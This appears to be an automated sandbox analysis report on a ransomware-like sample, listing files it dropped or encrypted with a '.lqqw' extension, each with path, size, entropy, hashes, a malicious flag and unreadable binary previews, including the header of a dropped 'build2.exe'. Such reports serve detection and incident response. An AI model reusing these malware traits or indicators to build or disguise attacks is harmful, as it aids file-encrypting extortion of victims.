                                                                                                                                                                                                    Preview: ...cMz..........C3u..8.=.F....vk......Dl.QL.F....B.Z...\l.ZX,9O..~2.X....S.....>mh.*..v.-.F~.z ..qW~..A.Uw...$.5.....>Y)wZ.L...L!.3;L.c.=W..a.:.$.S.5Q.\...w.j.|...`.......5>5G.}.6#.5Wp0Xm].1.\....Di....G.O....W......]I..i.a.........B./..m@.jo.v.K.K.6.A4..Y......hE.z_.s...4:.......|. ..y.........N.}<...X.PzNhoN.8WJk...f.`..!.kY....C6.a@k...._..Y.R.....=..F.9.R.a......d...{..x.....\[.-.G..Q.L.p.S..<.S.^.0=..-.M..H.mH...zhtH...n..:.Y.".]....d.I+h..!V.S"...A.Mz.5..).....\...)h.>.Ua..)(!..]]...h...@.$h......k.f...L..T.h~.#.....q^k0.M.{...q.r.S...qly[..PStL......:G.a.@....Y..e?.K..*B.{X.... .W.."[...bg.....3..97_.@.U.......#..E....n.z!<.D.v../.....b....S...... ...yaA....Z...j....o......e......K..6w..hS...s...[4qzD.......9.9:...jF..#.......q..`...p:A.w.j.....bg.i..C..\..*[..X..)t.0=PE(..B.*l....Pd..!o.w..Y.8..Z...8.G.%.~.K....G...Z.....L...U.z.eI.bS.P.\.a.R.p...>.X..E4.-..A..g.ff`K..$M(.."<x0.S~...x....g.Q.Vn.cW.zv#bV......B>....f.k.k4.[L.!..L~Z."9
                                                                                                                                                                                                    C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998912267073351
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:MGRkqlsby6daTh/q0/L2nT4EDCERHUN/uhFwe5DpDeC/vahTGLpV5+qcmBh+3:MGuqlRmwAX4EDxH3hFwejDZ/vahGVV58
                                                                                                                                                                                                    MD5:DE6AA5181C33599240641CDEAD55E9DF
                                                                                                                                                                                                    SHA1:4F9D771B3EC47790D6419E8BE3F11A47978480DB
                                                                                                                                                                                                    SHA-256:2A68D55B3330218F973AE2D7C323AE1AEE2A47EFFE2863EF4E02D8207BBECB39
                                                                                                                                                                                                    SHA-512:5D99F376801EA07D42B4D095D39CDBA23DEC6B271B7883A146C3FA74ED0A8FC4FC5757D651AAE559FAEA15DE7065D9181B97ED4930DCB9422C00526DAA3DBD42
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 7....zc.j1...................G..4.-L.f...I...B........0..s......d.+n.A..g....uj7.s.S...*....1....Q>........Z<}t.......Q.............f...("WJ7....#,2..vU....H....:.....?.j......c..SO@..!.4..U..,b.Y.8......$dw..p)N..Us..@.IE..4.NY...6.N^+.p.....&.q.M/Z........=E~T.+b..'...A...:...`g..&J|.J....l.z....KI}.."2&.$T.+..%.(p.7FAvF.+....9....An......6.4..t...n/o...e.1e.....I.FO.$.....:.;iy.).E....Wg....p..^*.......X...D......k..X.....)...Px|+.......}.`N...$h.B.....CuM..9..<=...f....@...d.....n....r......DIb.o.P...F.8.9..J./%._'[.d.p._n.v..M}%W~.X+...SO$6h.7...j.......bb..L`s.....Jm...^.Ox..PN...Mu.u.C&.:2..fp...."x.4.....oT..6[W7Uc.......E|.+...D`..v..6$8....baV..D+.n...G..........S..*....s4.....Q.!H....)..k....q..ju+.......X.Q..^0f...J0[(..@.`}.....\j..OD..b7.{..-.k.3....F......[..4J~......ynF.H.L4w...6..7.......f.uB5...........U$.W.(.*...\v.~\Pn...[.<......*>.\.;.[.f.G0..GMp..Wl..R@2..P...9p/...b...xY^.p....pW..JN...~ .r}.p.|..A=.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Adobe\Acrobat\DC\Cache\AcroFnt19.lst.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):9895
                                                                                                                                                                                                    Entropy (8bit):7.982428262472945
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:RVXQK7GwPtzyF2h6vK9j49Ebi4O+766+G/XAPWxSGSqp6ZVl4f1C5B9bWkf:RpkwPtzyMMq4f4yPcZ6jo1Cckf
                                                                                                                                                                                                    MD5:D00A8509CEC0AF4E30885487AE1070D6
                                                                                                                                                                                                    SHA1:237DF7DB499669118F2A6EC61889D429357F62BB
                                                                                                                                                                                                    SHA-256:84C009C605C5D2E57547EB736AEB97B9D2674C251B008DF46A7A0D7589FCB5A3
                                                                                                                                                                                                    SHA-512:44ACD87A70987134B0E1B481D4028213A395484253C2F4FD2017CA27A74A028C7241542DEC8DE9B22095E38A853132EB2C69C5434E5A6F9D955C259D9B34B468
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..U3..+......."[.d._..3.`....+.d.mi..f.........6.o.Z..H..d.X.VE.V. ......k.=5... JK./$.O(....Rp.p..Y..~..;....<..............q.>..H....Y...WQ.>..bi:;....{....x...u.O ..E_k.9R....?..h.4.A..q...!?u....j....U...p...h..2'[G=..u.2j....._.U...3..2.U.0'Q....X........q...9.!<rWG...h...F....G.d..$...... ..\.H3.......S.B.'0.....(..LU."a...Y0.....0...5)...._-.D...O.:.2.'..c(........B#{!.H.:....W.U...D......~.w....,..'...s....&.t...&...O...Q.s.sb.....3..e.........f........%KN..._#m..2...[.2.\.Yg)m.y...@...e..l...G~g.UA...O...\.....p..e.|.C,..........<B.pf.._)A.Y.3.1.\..Y../..I.....U..?I...@...P.p@..^.B.L.^.l.K.....G....[....x....?N.}.~...^..%m.A.....Sv..4#;W.C.$ZD6.,.fK....j...*.H.'....3)..<k..[t.sYW.U.*..q....U.c...`K.].Z.E.. .5..B..Pq...`..(8f.k.V..9...2..2I/Y.]Pj...@h..^!$D..=i...U.I....t...R...h. @...i.....@.V...Pa.N.........5z.P^.X.]...g.W)7.K....>zF......H.i...=t.........h;9.!...xr..Bt. ......;.._.n!..f/.)dd..w .."..z.H....-...>.................
                                                                                                                                                                                                    C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheRdr65536.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99899410562921
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:EeDoejIgQBbbdFjmTHDbN+y5wPxJoXUWPVE/HA78eKaPSACHokrJz:EeseMgQB/IDrXZYEVKa0Ho4z
                                                                                                                                                                                                    MD5:B2FA0B2BA2F40A2B252CCEEA6C92E1A4
                                                                                                                                                                                                    SHA1:DA854B0845C85BAE3C7E612860E760D8C49E9575
                                                                                                                                                                                                    SHA-256:539874A08B9536ECBB00564EFF9BF79A1A78C04BA702F17F09341458637EEEEB
                                                                                                                                                                                                    SHA-512:809777AB2AA9D253F8893485CA40F72E6A2A0EE6DCE2051B72327AD7285018553AFF6D0CBEEF1F2394C33C5575BA20737947B4EFA0192902AE0B0BA6EF6725B0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: $........}J......I..V.G..d.D.9.;,J;......-...T^j.[1op.uSi..b.....T9^...........9...Nz.xp...h......O.-5..c1^.K....[Aqa..i..,..0.a#Q#....5.p...\.t...y..x z;.Y!..E.....R..rv0.9.!.4..^...oh........\..&z..S.......&...L6...87:...2..r...........8.I;..i#....$.o...P.M^kc).@...D..SCS.....dH ...7.MZBm$..1.n.E~.....Zi......5...m.G..._.,.L\jp.1p.l.p..L.gu.C...@"....!.......Z.....q*..ff0..~...y....?..>....v..k.Z..}.[Z`M..S...q\tw.....R.<.t.vq..R4...rV.M..Z.*M..~.o2......h...<'.....+...3.@?. .3..gn(.!V.q+.3...M.W.vZ.. .}..q.[......j...{....;.....#..s.......pO;S...y.?.;=.....C.|........p{...%..I/...S.$y/.%....]V..~.D....]....ua....D4pD..f...f.T.K%.....)?1.....^.....e....G...R..-\...<....H.UO......0.Exo.1..S...Em.(#.......6\....'..FJ..5.t*....!.!Ew(.....>.=..y.:N@.a..b...-...iJ.D..../r+........>e.....y&.zc....e.]..k..i.r.z...7W._.(W.......o.oCEy."...g.....`...1...@b..'.OI....+...rpD..'..b.&.k.4e .[....lJ*5...J.c.4_...|_.[7.."...Mu.D(.V0.....Q>_.N.........
                                                                                                                                                                                                    C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):63927
                                                                                                                                                                                                    Entropy (8bit):7.997165266892772
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:sECBnLc7Aegy6gMeOowCEZI0CEN+Kklv+hOLxEEuu4EuSF4yD+xMZxe9:sXLVXdeOozEZI8N+tlvyOKlOF4yKxMZ0
                                                                                                                                                                                                    MD5:817C7492F71B2F0046129E77D67AB3BD
                                                                                                                                                                                                    SHA1:350D7EB934A5EAAE28B8099CEA1F52EDCB3C3EC7
                                                                                                                                                                                                    SHA-256:F236E601E881787A88B1744FBC2AEC59A4220137400C825960183DE81BDD995E
                                                                                                                                                                                                    SHA-512:C70E4BF482EDB41C7807E92EBB87A84A211349B13BFB2E15ED4C0D825D9C246A750631AFE8B3AEF2431383067A29B46D0CA9B1AC57CB9EE1D3A89B97E1758E26
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Fl.d....q.{.&..4.VC.....)q6.3.[..-.I.....d.}.q.6H.*.'.G....1o8!\M..k...-...0...Pt..D...(X.D...=.@a..cK.............M..D...'..,q..`w.C.1.....R....w.......i..p.q....Lc.2..B..E..V=..[.L...+..9.^...tXs...u..%d.B2F~-?...~..}.>....z..w.a.@&.....(.~........B"7.....Y5.M7....../....O....F..f..u.y@[...Ws...-.D.J......\...B.d....%.N.IFE...N.P.8f.....I.c.:Z.....9".Y..v>.7.5j]h.Y..c"!w......O...l....-`..l)dv.....K=.{............`..l..eD.h..d...~....7l..U..J....&..O.......3x..(....me.S.=..w...I.I..i1d.&;Q.{....S.q.CI.$.}.*.>5.<.M.Eh....G...w.%.. .Q<s.}}......n.y.!..~...v..a...[...7f.G.....G..w...?..'.q...d...5....}.d...<].(&..[......B.p.P....(Xl....A_.;..J.|9...7..(+\$%.t...S......Fr..|M.A|......../|]2......:.._.......Me.S|....}..$..TNK.;.....C.b7(...1l.A.9....q.U.........4.p ./7.>..j.#.x.....) . ..u..,..(o..,.x.<.*K......J.....>2.....cn!.==.=..|K.H..@x.";.!.i.6EcZ.}5dP&.m%.o.v.5o.....`.S..{..'|...c.FR)*..A.9a..5.J...}......*2..3.>E...`.<... ~..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):927
                                                                                                                                                                                                    Entropy (8bit):7.75982768664986
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:6PlxqoIij99kAIrYjoYOft63SxRpN2OrPxghfXbD:6d5rIso163UpvrmJD
                                                                                                                                                                                                    MD5:2D371357330C8A1CDA9F35E1A96CBF2D
                                                                                                                                                                                                    SHA1:9245DC1EDC834E0468D3E17097BA094B33586BE7
                                                                                                                                                                                                    SHA-256:B0A2392FCC51F565DB276219F30012934D7572B27839E268559848A5046EFFEB
                                                                                                                                                                                                    SHA-512:9BF2DEAC404164AFD55A7DC3E053AA4693D0AA1635B0B9CF567061BCB62D71E2178325DF4BDC7D7FB3041FC5BCCDEDBBD878AD7D3EB10A240892BE3C26CFCB4B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: \.Y..`....a..........f..z..\Mw...n....\.*..Y.&.....Z..H2....$9mJ..gs.O.X... .;...@.. AN.q0...0z{...w.=.`..C1[.*.d....+NS...W.......o.Y....@..,[..M..,.....<bbY...8...wKB.....D<v....h..R...j.n..%.)..Z...s..@.X.!.'....=u......`.....j.......Kk.F.K........1...'9.2i..Sq)...`.I.!...O9......o....x.=G:...bd...j.Q.:c....L2....M.4....`.Q|I..v].....^o.M.bOF.t..<.s.d....u.{..I....D........0..R....K..7.h..$...|;R3.9........(..?.t&.lQ..b..J...Ar......H.sS..S.....~...?...~.=...s.j_...4p../4&.....4...4.1.a...M..;xp.........S3.a.9!.&.].....=2...-.aDR.D.U.x.x.... ....ja.+.m...:.}x.dI.?Ip..qxO...x....@.H.n....p..2Z.3v-..*\5n....1.o3._C).]........3..bdA...Z.s..m.K...ryt...x..l...OAI....+p.I^.e...h.q...=....]..c\.L,.-..T...G9..U.]....V8.....p.k.....E$.nW...I.".x..s..4"72.at_.'.....|H.{@.......e.p+F..@s{.=~&5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\PenWorkspace\DiscoverCacheData.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2626
                                                                                                                                                                                                    Entropy (8bit):7.91661476347085
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:rDEhI0PitXNQMPoaBAi+eh1WojXCniOVHaxG7/MC/hvDl3bu1xD:HrNtXvPoaB6VHMG7/MC/Xbc
                                                                                                                                                                                                    MD5:3EAC147560C58DD839BEB4443AE4D159
                                                                                                                                                                                                    SHA1:FD0829BBCB67F94648310B6AC7F00CB693833B57
                                                                                                                                                                                                    SHA-256:D38477CC79B002B63D2429410ADCE20E4E722B1FB410B96771FFAC0DF0A58C5F
                                                                                                                                                                                                    SHA-512:DCCFE30281D4615A89E45F50C5CC061220762C4B715B7B9D2BF912D1CED8BE196738CA612AA4856079529A07738B10670C0C052C355C13B3F4EC040EA6871169
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...C..0O....5..n.....!.M..X..Pd.:.= ..Q...M...../.`......&...d..L3~..m....Q....m...}w!*+o.X.....{..<s..S.5..FGcm.....3.Q.."K...N.z.IJ....4.HG..)s..d.u..G....).E...........w:D...sK.m]F...b5..w2e...T:X..G....b...tFV.;{...+..is]2.^41....iTe..K.u..Hu..7.a.=~...j9+"bD._..-....!.....N:..NQwB.....j....T..1.R....{...4.<N.w.}..4.YE.bO?..O.k..VUu...t...n- 4m+...s.,.1%7.n......\..B ..E.3.L<....L.^..A....P..S.E.L@.....n..I.."p.Ys..fK..v.jN..X\i...H..@[.f.F..M.X...h.7...yt.4..L..aj.......-ZF....G....D.`5..SEzcLF..W...#aI8U.o.....^..../....g.3.&LV%..)..'~`vu.y.R......F...u[.r..l.9W....j.kR".o...V........V.'_F.KB..{v.5.....5.G.....5<t..$.......0.n.>@..)...?.S...7.s.7...D..N...zjW..I5'.Sypy)./).Zh....V(.A.~..v......T.....j..v...;.r.}A.h*...J...)..?;...Xi.sZ.g..rF..~e.hr.....WVZa.;..JR..U.%...|d.4#..t@u)C...et~.g..J>./.s....0...(...O+8f.....)..6V.."."]..F...U...~..D$..rZ...z.lGdi.S.Y!.O.4%........h5.3f...e.X...oH.&..o..6.e.^......M......LP.L.....~.z.z...I..(..=...?..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Application Data\Application Data\e346cd35-2444-406b-9a28-805b44471c0b\build2.exe.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):761678
                                                                                                                                                                                                    Entropy (8bit):7.897710485901009
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:O5AjmTKC2y61v9a/z8rKV66dPnfqoJdmXT8rnsScocFtR7czoL:Om4K7yBUKc65fq/8rsckoa
                                                                                                                                                                                                    MD5:FDCDAA7851A092BA79EC5702DDF65335
                                                                                                                                                                                                    SHA1:29B0CDEFDC0269E1294DC500EE72BD03D7C64CC5
                                                                                                                                                                                                    SHA-256:9D96B8DCD1079282E94547A8C123DBA5B72B4164207B26C542A547F718F05BC0
                                                                                                                                                                                                    SHA-512:FCDE2A9F50750151D408D396324A3E06D4C637B431FD275803F9945A6B0EE4B45F1B5C45EF41F296B9D84E2C7962BD67355CF1BA0DC5B5939833F2172A112A6A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....)_.................6...X....../".......P....@.................................Gr..........................................<....`..@........................... R.......................n......`n..@............P...............................text....5.......6.................. ..`.rdata...?...P...@...:..............@..@.data...\....... ...z..............@....rsrc...@....`......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97854966518348
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:f42dNv0om0rZJaZByJ7UDp+8DJKfe2a2hfzlxygcAJpjibq:g2ZrPaC6DpdcBye/uG
                                                                                                                                                                                                    MD5:597DB45D97EC507EC2505605FD01C652
                                                                                                                                                                                                    SHA1:74C36E2D55E0CC44C47D828BA00731714BA83456
                                                                                                                                                                                                    SHA-256:C32E3517BAFD09257DEBA18EB352AEFA9B1A1755CB7AF07CED8264679AA46CAE
                                                                                                                                                                                                    SHA-512:1F632C6556C8D7459E25574D32DA9F3CF66B393E602A8E6EE48174B3F7ABA0E090E6E43D5C7A122CDB8B272CF6C4D84A93FB9F96A5ECCEC08D5FF3E3EF14CB6D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]s.....3(Pn.f,.j.......}u..-.....%o..o...Y.x\....\.Z8...3[.......7;.=..."h.+*.$/v.t.wds[..N.:.wuXp..t..Xr....tK<...+%.'.9..p.+...A........[pNxULE....p.$.j...t....dgRp.p^$[.)W.A.D...]....!.....s&...l...7._Z.3[.5..x.._..zo.....v..fB..............2...&......e..<(..l......y...a...j.s.a..W#.?.c.<..>..(....x...Q.h`s@.G4.({$.D....\.p!.........t.c....E.....&e.)......<.^q..V.-...W..*S.W....c.......Mjq.`.h...S...-..O.?.s.!z\.|-.QmN.:jA.....F!&w.q.....\.(.n]e.-;..I.a...s..W.%.\.;..0...~.%j.....@..fk...U?b4..L.......M.Ox......2..{..5.....g...i.q.R.{.k\+...JDe.b.E.@........9.PG..z..'._xcyL.FoB)...`.1........Vn.*.).9#.......W*1.)...Q....y{'........W Fz.k...w]2...d.R..vjvN.5)g_P.nO..:..k..);..,....h@@..;p.n.rv..7.y.x......'....L.....B....C.....i9..o..A.o%.>...u@..[h....s./s/...1.EnZ3.....j.......Q..Z(i..f.i.u?...F......Kl+.a.......Wp"~. .6..^-.?.....6.iI........p..<.Yd..C|....~.m....u).A">.i.Mk.8=.k....o.V..ch*p{.....<..BJ......iN'P
                                                                                                                                                                                                    C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jtx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998792179900664
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:d6/lvIKP00g3/MKOjSGdEtM3Ye+9VGVmv+LhAJQ5Db0x36mQVe:dST83/MKGdEtmarKAJiPyt
                                                                                                                                                                                                    MD5:BAE3D4FC2EB4ABB1296C36F0A078F35B
                                                                                                                                                                                                    SHA1:633B5736B0D27C66A6B9ED3491EF26D383DECC1E
                                                                                                                                                                                                    SHA-256:FA1A3F468BBB803A063D44503BE7267CDB062498CE3FB39B7E6C5A5CB7B488B8
                                                                                                                                                                                                    SHA-512:39C143732ECB2CBEAAACB21025265E5AD30608F12AC933A75E87C9B4496220C610096CE9EA2DDC255A8D225B997F02E1A536DC685DBAD6C0724DAF1631AE697C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .vY...~.........sz.*........6E.U..J..t............J.c..S...qK-..G..4.Di.O0. j...p[T..?..].5>r...V...MJ...1x...EA}.....D.rY]/....vGU.v..8Zz`.?x._...E....Su%..]...y...'^K.o...^N.?AEU.V......(Nn.o....oVG,.............).S..Mu...3J$h&..q....vb......4..r..:.7.s....6Z.o5...$.....DQ......@.-W.e .kH..R..Z.........]...Z.15....<.2.WX0.8.].{..Su.r.p...@.o....x;oA...f|;.`....5.(.|........x./cRz....J...(..fm....d.C.g/...K.b1.1"J/...L....J.....O"l.....5......T.9......u7R...D.q3,...].v.Z....,4.0..&UxYr.-..)..R.P)d.?..t..?......._Z...|.rLL...0.v..Z.;=..q..fM...50+..@.. ..U..}.0...~#`..7YGx..J...=.9.`..f...$e7..\2OZ..6.^.+..rt../........2L.....#@..[....@2.......L2...^..v)......+6.T0.;(.k.gg'.|\..^J. .....e.].".J...^]....q-.......b..XM...aI.kN..t52..;...m{..i.fE........{..Y.O..~>9.V.^.._-@%..thq^r.^...7t.U....>....L ..A._=\n....".n.H..].Wk<..... ..}.....g...X.z(.}.xGhul.]...-...8xj.eM&.....Q.....'.....[.c.%.. ..-..4..84..\.:$'.c#/..'.e.@<].5...B.3$Hf.D..C0Q...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:SysEx File -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998859064377633
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:4faXYLYHQ1R2X15nB/tZgGTLlN19WcHM0BqzOF+AjSXpThIk/w1:44YLxRE5PTBN10cHd6AG9h3/w1
                                                                                                                                                                                                    MD5:8937FC62031A3BE6C2D51B04CFCA03A2
                                                                                                                                                                                                    SHA1:856809A74B32846D45E3B971F2DF463BE2915423
                                                                                                                                                                                                    SHA-256:04F744FE86171F95D69442E9509616593B07776768AA98C20AA9A04BD5236048
                                                                                                                                                                                                    SHA-512:8B4F46BE88CB77DD0CBBC3CD07566CC2CE44D4003BD1695EA0494EADA872588A469D539FE023CEB7D7FBD1AB5056F6E964F4A3388752167C7F551DE607286541
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .q.....q....UW.]......5.tY.SXCC...>t7^c...)^3m.f.9..j..n.s.....1.~....H.,^".......t.-.-rH.@ Nd...{.....A....uG.n)...._.S-X.8.....P.oE.4M.'i....M.d.\{....J..o.[..Xh..R...Ab.!...9^.b..eqy.+.L.Z....l.1Dh.o..b4l3...i_..._p.T.A.2_..._.0#...aQ..Z...b&.e.).1..+..r....^.......\..EF.~mFr.._..Dq...C.E1MK..]...M....4..&....r2E&x1.Z.h..:..8[.K$?.....cd.kAW..4,..w.8..>..:1.S....&.'.D......1..T|'.@.K.......tn...........i..|....\.E...e}....Z.s..9.......I..a.....-......:#..+"Ff.._(.z..8.a...... ..%"te..<.;...F..^...UR...4..6g.{._..?.V:.2..N87..^.z.u..Y.ZK..~.J.+...".!9...|... ..J'..*"..w....:.......\i%."...n.>0..Q.^@.....c.Pb.V..zl..B.Ji.{%k..{............2.Z..u.<..9.2....0U.hC.m5.m..+=z(Q...49.....4V..Gg....&.@.....S...!DP..3.."..&..-.).S.R| .."%K....U.......).sk[MiF.?.lP.X...7..H.....*kO...P.z..9E(M...c7|...v..I..7..\a|9ES1.v.U.\...........H.t....9>..Yu.4.bZD.".c...\.P_v.....a..)......P.n$F..s0.... ..L....6... .!.a...u,.b).\.)6...#Q..d.....[....jc :
                                                                                                                                                                                                    C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998861631260451
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:kudZy7nPAQRXlyKDmtxVszOsyAqnHdMBNR3C4DpdYDRLsq6cKC+6RF:kuHy7tlzm3KydHCRScYDRLsqhNz
                                                                                                                                                                                                    MD5:306D5C39EE73DA51B0742CB24AD4F0E4
                                                                                                                                                                                                    SHA1:0D12CA47FA3B7EC4C3D1359F048799F74B2C5AC7
                                                                                                                                                                                                    SHA-256:853540805B978F73D209FB2CAEE9C03606B9EAA755A91A2DCFD418FC42552561
                                                                                                                                                                                                    SHA-512:4ACAD8426AADBA6850B0C18F74BD1DAD40796037566C3D855D547B77C630537525D44BBF9B0A87209392130E34A999D0827A693095896ADA41748EE43F016372
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: }.d.........A.~.S3T....FUD.1O...L.l.q:Nc...Giu..p.4).0.E.9X>..+..^.1......uQ..e..,....~y...xO.1G..'M.!.&e.DX=.F...U{...\f.R..j p......C..$H..gL+./..Mq..(W.u.m. .|..KJ.......%....*..>.e....k........../M(..4....C....b.;.s..O5.X....+..Hd./.....]..H....l....J.=.".4......o.ro..B....Y-...s...3.Y.3......y..........`W~K....|KG.?e..j.s...`.%.Ap.R..U....K.b......g.B.../.i...9h....n.t-.zV...;z.5...pU..8..f....Y..q.+..#..".*...........l.D.......v.n..E......me............Ip\..fN..(.a........F.8g(..9T........oAa...)....f.../....-.v.s..&<..p..HAc.a.6{....g\..r.M......Y...:.O.&7...G = .@d.hv.....MF.O.45...Ve..m.3...HWN....9T.w /..U.`.."..)@S.r..?[.....Y...~..x9#....F.1....,.n*...7.2.....V..p..do.........2zx..`.?,.0.<.'...._.`+........-...w......frO7........YPzdI.N.e....#Y...}>g..[.D..m....$......]...w/.-E..B...3q..5..,.<....L...)7..>.Z.G9F....s.Nc4. .....f......3E.9P*W....3.F5...O.<.L..I?..5..6.e..b.q.u.>..<]...i..rB f5-+.v..0.....}.S..W5h...X~
                                                                                                                                                                                                    C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998814699114246
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:MtOReHfuBM05Jw8wzH7Lpe5wQuiB7abot0vyes:M84fuewJaH7LpawS7z
                                                                                                                                                                                                    MD5:06BD651174ED4D90709DA6B3D2D9FFA1
                                                                                                                                                                                                    SHA1:970014FB0D5D3CE793EB51553B0714FB9F0B71E0
                                                                                                                                                                                                    SHA-256:831BC3266A5F1CE846986BA2E7E4721485B2BDD6DED2E0C1DB48C73D09F9EC36
                                                                                                                                                                                                    SHA-512:FD796878413A205C5138BFB5CEA5392A422F075559B61215FC4B864CBC2D59F0A06B6FC6707E530D7E0D0B0528517E2C35CF63C5A028FA8017DB14B9BBC7203E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
